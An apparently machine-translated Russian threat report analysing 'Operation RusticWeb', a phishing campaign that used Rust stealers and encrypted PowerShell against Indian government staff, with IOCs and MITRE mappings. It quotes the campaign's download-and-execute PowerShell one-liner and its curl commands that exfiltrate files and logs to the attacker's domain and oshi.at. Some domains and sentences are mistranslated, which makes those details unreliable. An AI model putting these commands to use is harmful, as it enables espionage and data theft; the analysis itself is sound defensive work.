SEQRITE Команда APT-лабораторий обнаружила фишинговую кампанию, направленную на различных сотрудников индийского правительства с октября 2023 года. Мы также выявили атаки на государственные и частные организации в оборонном секторе в декабре. Для кражи конфиденциальных документов на веб-сервис, а не на выделенный сервер управления и контроля (C2), использовались новые полезные нагрузки на основе Rust и зашифрованные команды PowerShell. Активно модифицируя свой арсенал, они также использовали поддельные домены для размещения вредоносных полезных нагрузок и файлов-приманок. Ниже приведены несколько названий доменов и примеров приманок, использованных в этой кампании:
- Форма IPR Департамента кадров и обучения, предназначенная для сотрудников IAS
- Поддельный домен, имитирующий Army Welfare Education Society (AWES)
- Статистический отчет CDR Ассама от Детского фонда Кайлаша Сатьяртхи
- Еще один поддельный домен, имитирующий Parichay, правительственную платформу единого входа
- Форма заявки на участие в Фонде обеспечения офицеров службы обороны (DSOP)
- Презентация ежеквартального обзора инициатив Министерства обороны
Эта кампания отслеживается как Операция RusticWeb, где несколько ТТП пересекаются с группами АПТ, связанными с Пакистаном – Прозрачное племя (APT36) и Боковое копирование. Он также имеет сходство с операцией Бронебойщик отчет, опубликованный Cisco в 2021 году, и таргетинг с ESSA стипендиальная форма AWES наблюдался нашей командой еще в том же году.
Злоумышленники начали переходить с известных компилируемых языков на новые, такие как Golang, Rust и Nim. Это обеспечивает кросс-совместимость, но одновременно затрудняет обнаружение. Среди недавних примеров вредоносного ПО на Golang, проанализированных нашей командой, — Деформироваться вредоносных программ экосистема который использует бот Telegram в качестве C2 и полезную нагрузку на базе Linux Арес КРЫСВ то же время операторы различных программ-вымогателей (RaaS) перешли с Golang на Rust, поскольку он обеспечивает высокопроизводительное шифрование и скорость обхода блокировок, а также гарантирует безопасность памяти.
Цепочка заражения 1
Первая обнаруженная инфекция активно использует полезные нагрузки на основе Rust, используемые для сбора данных о файловой системе. Вредоносный файл-ярлык запускает заражение, в котором поддельный домен AWES используется для размещения этих полезных нагрузок и передачи данных на веб-сервис обмена файлами.

Рис. 1 – Цепочка заражения (1)
Злоумышленник атакует жертву с помощью фишинга, приводящего к архивному файлу с именем «ИПР_2023-24». Здесь содержится файл ярлыка Windows, маскирующийся под PDF-файл с двойным расширением. Название комментария предполагает, что приманкой является форма, связанная с правами интеллектуальной собственности.

Рис. 2 – Вредоносный файл-ярлык
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -nop -c «iwr 'hxxps://rb[.]gy/gbfsi' -OutFile $env:USERPROFILE\Documents\file.ps1; & $env:USERPROFILE\Documents\file.ps1» |
Открытие этого файла запускает PowerShell для загрузки и выполнения скрипта из rb[.]gy domain, бесплатный сокращатель URL. Параметры командной строки для обхода политики выполнения без профиля используются для загрузки скрипта PS1 с помощью Invoke-WebRequest.
виктимология
Используя сокращённый URL-адрес, мы можем проверить статистику по количеству кликов и стране, откуда они были сделаны, используя их трекер. Кампания стартовала в конце сентября, и в октябре наблюдалась высокая активность, причём 26.53% из них приходилось только на Индию. Это не учитывает подтверждённую виктимологию, но даёт общее представление о целевой аудитории.

Рис. 3 – Виктимология
Стадия PowerShell
Расширенный URL-адрес указывает на домен с именем awesscholarship[.]в для извлечения и сохранения скрипта PowerShell (файл.ps1) в Документы Папка. До проверки этого скрипта доменное имя выглядит как стипендия для «Общества армейского благосостояния и образования». Законный домен этой организации — стипендия[.]awesindia[.]com, где ранее уже наблюдались подобные фишинговые кампании. При открытии этой поддельной страницы домена происходит перенаправление на официальную страницу AWES с официальным предупреждением, как показано ниже.

Рис. 4 – Официальное уведомление о поддельном сайте
Скрипт PowerShell начинается с настройки URL-путей для загрузки полезных данных следующего этапа вместе с документом-приманкой. Настраиваются целевые пути для загрузки и выгрузки файлов, где определены три функции, предназначенные в первую очередь для этих функций.

Рис. 5 – Скрипт PowerShell
Функции X и Y используются для записи сообщений в файл и загрузки файла с указанного URL-адреса в целевой каталог и его записи в журнал. Целевое местоположение — это местоположение по умолчанию. Документы каталог, в котором новая папка с именем Скачать создается для размещения поддельного PDF-файла и архива рядом с папкой.

Рис. 6 – Скрипт PowerShell (продолжение)
После открытия приманки извлекается архивный файл, содержащий один файл без расширения. Он переименовывается, добавляя расширение EXE, и запускается. Затем функция Z используется для загрузки файла журнала на сервер. виться команду, а затем удалите записанные журналы.

Рис. 7 – Загруженный файл журнала
Между тем, открытый файл-обманка представляет собой форму заявления о возврате недвижимого имущества, где услуга упоминается как «Индийская административная служба'. Множество подобных форм на различных порталах индийского правительства доступны в открытом доступе. Однако эта пустая форма IPR доступна на сайте Департамента кадров и профессиональной подготовки (DoPT). . Это относится к Министерству по делам кадров, жалобам населения и пенсиям Индии. Обратите внимание, что это никак не связано с программой стипендий ESSA (Education scholarship program), предусмотренной в форме заявления на получение профессиональной военной стипендии.

Рис. 8 – Приманка: форма IPR для сотрудников IAS (октябрь 23 г.)
Загрузчик: этап проверки системы
Полезная нагрузка EXE оказывается скомпилированным двоичным файлом Rust, который проверяет основную системную информацию, найденную в пути PDB – 'syscheck.pdbПосле разбора имён функций Rust с помощью плагина IDA Pro мы видим множество вызовов функций записи и выполнения команд. Он извлекает информацию с помощью:
- Домен ifconfig[.]me для получения IP-адреса
- Команда WMIC для извлечения активных дисков, присутствующих в системе-жертве – «wmic logicaldisk получить заголовок».

Рис. 9 – Журналы проверки системы
Эти журналы записываются в файл с именем «МояСистема.txt' в ProgramData\syscheck каталог и загружен в тот же домен, что и:
«curl -F TT=@C:\ProgramData\syscheck\MySystem.txt hxxps://awesscholarship[.in/upload/upload.php»

Рис. 10 – URL для загрузки следующего этапа
Затем еще один архив под названием файл1.zip скачивается с того же поддельного домена и извлекается. Он переименовывается в «MySystem.exe' и казнён. Наконец, настойчивость для этого окончательная полезная нагрузка создается через каталог Startup.

Рис. 11 – Сохранение через запуск
Stealer: Финальная стадия
Последняя полезная нагрузка — это ещё одна вредоносная программа на основе Rust, которая крадет файлы, собирает имя и IP-адрес системы и загружает отдельные файлы вместе с журналами. В ней нет встроенных функций сложных программ для кражи информации, таких как кража данных из веб-браузеров, Discord/Steam или криптовалютных кошельков. В ходе этой кампании было обнаружено несколько версий этой программы с временными метками компиляции с сентября по настоящее время (декабрь), и их уровень обнаружения на Virus Total значительно ниже.
| MD5 | Временная метка компиляции | PDB |
| da745b60b5ef5b4881c6bc4b7a48d784 | 2023-09-26 | syscheck.pdb |
| f68b17f1261aaa4460d759d95124fbd4 | 2023-09-26 | алам.pdb |
| 237961bbba6d4aa2e0fae720d4ece439 | 2023-10-26 | алам.pdb |
| d2949a3c4496cb2b4d204b75e24390d9 | 2023-12-08 | Zew.pdb |
| fc61b985d8c590860f397d943131bfb5 | 2023-12-11 | Zew.pdb |
Изменения в имени пути PDB можно увидеть в образцах за октябрь и декабрь, но при сравнении с помощью BinDiff сходство практически идентично и составляет 91%, за исключением нескольких незначительных изменений.

Рис. 12 – Сходство в образцах
Он перечисляет все файлы документов и архивов на всех дисках, которые были загружены ранее на этапе загрузки. В новой папке создаются два файла журнала с разными именами (Микро, Файл) для каждого образца под ProgramData Каталог. Они используются для хранения записей загруженных файлов и журналов перечисленных файлов. После сохранения перечисленных файлов в каталогLogs.txt,' каждый файл загружается через виться Метод PUT для оши[.]ат домен, анонимный публичный файлообменник, называемый OshiUpload.
«curl -TC:\Users\test\Downloads\ .zip hxxps://oshi[.]at”
Вместе с именем рабочего стола ссылки на загрузку этих файлов сохраняются в «Записи.txt,', который содержит три URL-адреса для каждого файла. Две из них — ссылки Clearnet: одна для управления, другая для загрузки. Третья — домен Tor Oshi для загрузки через скрытый сервис.

Рис. 13 – Ссылки на скачивание загруженных файлов
На странице управления отображаются атрибуты загруженного файла: ссылки для скачивания, размер, тип, хеш и временная метка. Доступны опции уничтожения файла и таймер истечения срока действия.

Рис. 14 – Страница управления загруженными файлами
Файлы журнала с временными метками в имени загружаются на поддельный домен AWES. Ответ сервера проверяется на успешность загрузки, после чего сервер переходит в режим бесконечного сна до тех пор, пока не будет прерван.

Рис. 15 – Ответ сервера после загрузки логов
В новых вредоносных программах, которые мы наблюдали в декабре, злоумышленник использует новый документ-приманку, принадлежащий Детскому фонду Кайлаша Сатьяртхи. Документ доступен на их сайте. ., что связано с их статистическим отчетом «Детские браки и другие преступления против детей в Ассаме».

Рис. 16 – Приманка: Assam CDR (декабрь 23 г.)
Использование в фишинговой кампании приманок под названием детские фонды или общества для детей военнослужащих и сотрудников IAS свидетельствует о целенаправленных усилиях, направленных против должностных лиц правительства Индии, особенно тех, кто связан с детскими фондами или обществами.
Цепочка заражения 2
Другая похожая цепочка заражения была обнаружена в декабре с использованием maldocs, где перечисление и эксфильтрация выполнялись с помощью скрипта PowerShell вместо полезных нагрузок на основе Rust. Наряду с двумя поддельными доменами здесь использовались зашифрованные скрипты PowerShell.

Рис. 17 – Цепочка заражения (2)
Заражение начинается с фишингового вредоносного документа, содержащего вредоносный макрос VBA. С помощью простой обфускации VBA он содержит зашифрованные команды PowerShell. Были обнаружены аналогичные вредоносные документы, использующие слегка изменённые команды PS.
- Dsop_Nom.ppam
- DSOP-NOM.ppam
- PM_INDIG_INITIATIVE_BRIEF.ppam

Рис. 18 – Вредоносный макрос VBA
Зашифрованный PowerShell
После открытия документа цифры преобразуются в символы, образующие «Powershell'. Команда PowerShell содержит зашифрованные данные, которые преобразуются в SecureString с помощью 'ConvertTo-SecureString' с ключом. Это похоже на расшифровку PowerShell, показанную в Emotet но с небольшим дополнительным запутыванием.

Рис. 19 – Зашифрованные и замаскированные команды PowerShell
В первом maldoc преобразованная строка использует Судебный исполнитель объект для памяти, управляющий расшифровкой через встроенный DPAPI для вызова команд с помощью SecureStringToGlobalAllocUnicode Второй метод использует PSCertificateData Объект, чтобы получить строку с обычным текстом. В последнем случае PtrToStringBSTR и SecureStringToBSTR используются с Судебный исполнитель Объект. Для обфускации команды используют приемы из Вызов-обфускация для маскировки запуска команды IEX с использованием переменных окружения:

Рис. 20 – Запутанная команда IEX
Просматривая полностью расшифрованные команды PowerShell, он загружает файл-обманку и скрипт PowerShell следующего этапа. Они загружаются с доменов в Скачать и Документы каталоги и выполнены.

Рис. 21 – Расшифрованные команды (1)

Рис. 22 – Расшифрованные команды (2)
Домены и приманки
Первый сценарий загрузки с домена 'parichay.epar[.]in,«В то время как второй использует тот же поддельный домен AWES, что и в первой цепочке заражения. Это ещё один поддельный домен, используемый для размещения вредоносных программ, имитирующий официальный правительственный сайт».parichay.nic[.]inЭто правительственная платформа единого входа (SSO), разработанная для подключения пользователей к единой системе аутентификации. В то время как Паричай предоставляет государственным служащим доступ к различным услугам сетевых карт (NIC) на основе «отдела пользователя» и адреса электронной почты правительства (@nic.in/@gov.in), Ян Паричай предоставляет гражданам доступ к услугам, ориентированным на граждан.

Рис. 23 – Законные и поддельные домены Паричай
Первая ложная информация касается формы заявки на финансирование Фонда DSOP (Defence Services Officers Provident), который касается Министерства обороны. Вторая ложная информация связана с презентацией ежеквартального отчёта для Министерства обороны.

Рис. 24 – Приманка: Фонд обеспечения офицеров службы обороны (DSOP)

Рис. 25 – Приманка: Министерство обороны
Скрипт PowerShell следующего этапаMail_check.ps1' dropped шифруется и обфусцируется аналогичным образом. Расшифровав скрипт, можно увидеть, что он начинается со загрузки и извлечения архивного файла, содержащего полезную нагрузку под названием 'syscheck.exe.' Он извлекается непосредственно в папку «Автозагрузка» для обеспечения персистентности этой полезной нагрузки.

Рис. 26 – Скрипт PowerShell, удаленный после расшифровки
Перечислить и отфильтровать
Двоичный файл — это еще одна полезная нагрузка на основе Rust с другим именем PDB, «Аплет.pdb». Он имеет временную метку компилятора 14 декабря и название Cisco AnyConnect Web Helper с подписанным сертификатом.

Рис. 27 – Двоичный файл с сертификатом WebHelper
Вместо того, чтобы выполнять перечисление и эксфильтрацию напрямую, это приводит к запуску скрипта PowerShell 'sys.ps1' в Картинки Для этой цели после получения имени пользователя используется каталог. Выполняется команда:
«powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\test\Pictures\sys.ps1»
При перечислении исключает 3 папки: Windows и оба 'Program Files' каталогов. В шорт-лист включены только 13 типов файлов: ('.ppt', '.pptx', '.pdf', '.xlsx', '.xlsm', '.xls', '.xlam', '.doc', '.docx', '.docm', '.txt', '.dot', '.ppam'), и каждый файл регистрируется в 'paths.txt' в Документы папку.

Рис. 28 – Подсчет и эксфильтрация
После того, как он будет загружен в оши[.]ат, URL-адреса для загрузки сохраняются в 'suc_logs.txtАналогично кампании 1. Этот скрипт работает в бесконечном цикле, проверяя наличие новых файлов. Журналы URL-адресов периодически загружаются по истечении определённого времени.

Рис. 29 – Загрузка журналов
Между тем, родительский двоичный файл (системная проверка) переходит в режим бесконечного сна, если его не прерывать. В этом случае вместо выхода он снова загружает логи URL в Oshi. Кроме того, на этот раз он также загружает их на поддомен FireBaseio в качестве резервной меры.

Рис. 30 – Загрузка в Firebaseio с аутентификацией
Firebase Realtime Database — это облачная база данных NoSQL, которая может хранить и синхронизировать данные в режиме реального времени. Это открытая платформа Google, которая широко используется разработчиками для облачных приложений и привлекает злоумышленников для развертывания вредоносного ПО, такого как Невезучий Камран для извлечения данных. Сервис предоставляет ряд функций, таких как облачное хранилище, хостинг, база данных в режиме реального времени и многое другое.
Заключение
Новая фишинговая кампания направлена на различных сотрудников индийского правительства с целью кражи конфиденциальных документов. Полезные данные на основе Rust и зашифрованные скрипты PowerShell были развернуты для сбора и передачи документов в анонимный публичный файлообменник под названием OshiUpload вместо выделенного сервера управления и контроля (C2). Оба поддельных домена, имитирующих государственные организации, использовались для размещения вредоносных данных в этой кибершпионской атаке. Операция RusticWeb может быть связана с угрозой APT, поскольку имеет сходство с различными группами, связанными с Пакистаном. Поскольку злоумышленники переходят на вредоносное ПО, разработанное с использованием новых языков программирования, таких как Golang, Rust и Nim, мы рекомендуем проявлять осторожность и принимать необходимые меры предосторожности для обеспечения безопасности.
SEQRITE Protection
- Lnk.Stealer.48397
- PS.Stealer.48398
- RustStealer.48408.GC
- Script.RustStealer.48409
- Trojan.Ruststealer
MITRE ATT & CK
| тактика | Идентификатор техники | Имя |
| Развитие ресурсов | T1583.001
T1587.001 T1588.002 T1608.001 T1608.005 |
Приобретение инфраструктуры: домены
Возможности развития: вредоносное ПО Получить возможности: инструмент Возможности этапа: загрузка вредоносного ПО Возможности этапа: Ссылка на цель |
| Первоначальный доступ | T1566.002 | Фишинг: Ссылка на фишинг |
| Типы | T1106
T1129 T1059 T1047 T1204.002 |
Родной API
Общие модули Интерпретатор команд и сценариев Инструментарий управления Windows Пользовательское выполнение: вредоносный файл |
| Настойчивость | T1547.001 | Ключи запуска реестра / Папка автозагрузки |
| Уклонение от защиты | T1027.010
T1036.007 T1140 |
Запутывание команд
Маскарад: двойное расширение файла Деобфускация/декодирование файлов или информации |
| Дискавери | T1016
T1033 T1083 |
Обнаружение конфигурации сети системы
Обнаружение владельца системы/пользователя Обнаружение файлов и каталогов |
| | T1005
T1119 |
Данные из локальной системы
Автоматизированный сбор |
| Управление и контроль | T1105 | Входной инструмент передачи |
| эксфильтрации | T1020
T1567 |
Автоматическая эксфильтрация
Эксфильтрация через веб-сервис |
МНК
| MD5 | Имя файла |
| 56cb95b63162d0dfceb30100ded1131a | IPR_2023-24.pdf.zip |
| 13ee4bd10f05ee0499e18de68b3ea4d5 | IPR_2023-24.pdf.lnk |
| de30abf093bd4dfe6b660079751951c6 | DSOP-NOM.ppam |
| PowerShell | |
| c9969ece7bb47efac4b3b04cdc1538e5 | в.пс1 |
| f14e778f4d22df275c817ac3014873dc | В.пс1 |
| 501a6d48fd8f80a134cf71db3804cf95 | Mail_check.ps1 |
| 6d29fc0a73096433ff9449c4bbc4cccc | sys.ps1 |
| Приманки | |
| a9182c812c7f7d3e505677a57c8a353b | Ipr.pdf |
| f5d8664cbf4a9e154d4a888e4384cb1d | abc009.pdf |
| 3ce8dfb3f1bff805cb6b85a9e950b3a2 | 1.pdf |
| a696c50dd5d15ba75c9e7f8d3c64997c | 1.pdf |
| архив | |
| e0102071722a87f119b12434ae651b48 | |
| ee8d767069faf558886f1163a92e4009 | |
| 9f3359ae571c247a8be28c0684678304 | |
| b0b6629d35451bcc511c0f2845934c3e | |
| f2501e8b57486c427579eeda20b729fd | |
| 20b4eb5787faa00474f7d27c0fea1e4b | |
| 635864ff270cf8e366a7747fb5996766 | |
| EXE | |
| da745b60b5ef5b4881c6bc4b7a48d784 | |
| f68b17f1261aaa4460d759d95124fbd4 | |
| 237961bbba6d4aa2e0fae720d4ece439 | |
| d2949a3c4496cb2b4d204b75e24390d9 | |
| fc61b985d8c590860f397d943131bfb5 | |
| 04557782d7017f18ec059fc96d7f2dc8 | |
| Домен/IP | |
| awesscholarship[.]в 89.117.188[.]126 |
|
| parichay.epar[.]in 13.232.102[.]189 |
|
| оши[.]ат | |
| alfa-aeafa-default-rtdb.firebaseio[.]com | |
| URL-адреса | |
| hxxps://rb[.]gy/gbfsi | |
| hxxps://awesscholarship[.]in/upload/file.zip | |
| hxxps://awesscholarship[.]in/upload/file1.zip | |
| hxxps://awesscholarship[.]in/upload/in.ps1 | |
| hxxps://awesscholarship[.]in/upload/upload.php | |
| hxxps://awesscholarship[.]in/upload/Ipr.pdf | |
| hxxps://awesscholarship[.]in/upload/abc009.pdf | |
| hxxps://awesscholarship[.]in/upload/1.pdf | |
| hxxps://awesscholarship[.]in/upload/DSOP-NOM.zip | |
| hxxps://awesscholarship[.]in/ppam/Mail_Check.ps1 | |
| hxxps://awesscholarship[.]in/ppam/syscheck.zip | |
| hxxps://parichay.epar[.]in/Win/1.pdf | |
| hxxps://parichay.epar[.]in/Win/Mail_Check.ps1 | |
| PDB | |
| C:\Users\123\Desktop\Syscheck\target\release\deps\syscheck.pdb | |
| C:\Users\123\Desktop\Alam\target\release\deps\alam.pdb | |
| C:\Users\123\Desktop\Aplet\target\release\deps\Aplet.pdb | |
| D:\HOME\DESKTOP НОВЫЕ ДАННЫЕ\Zew\target\release\deps\Zew.pdb | |
| Хозяин | |
| C:\ProgramData\syscheck\file.zip | |
| C:\ProgramData\syscheck\MySystem.exe | |
| C:\ProgramData\syscheck\MySystem.txt | |
| C:\ProgramData\Micro\logs.txt | |
| C:\ProgramData\Micro\records.txt | |
| C:\ProgramData\Files\Log.txt | |
| C:\ProgramData\Files\Records.txt | |
| Документы\downloadAndExecuteLog.txt | |
| Документы\файл.ps1 | |
| Документы\myfile.zip | |
| Документы\распакованная_папка\файл.exe | |
| Документы\Загрузки\myfile.pdf | |
| Документы\пути.txt | |
| Документы\suc_logs.txt | |
| Документы\Mail_Check.ps1 | |
| Документы\syscheck.zip | |
| Загрузки\1.pdf | |
| Картинки\sys.ps1 | |
| %appdata%\Microsoft\Windows\Главное меню\Программы\Автозагрузка\MySystem.exe | |
| %appdata%\Microsoft\Windows\Главное меню\Программы\Автозагрузка\syscheck.exe | |
Автор: Sathwik Ram Prakki



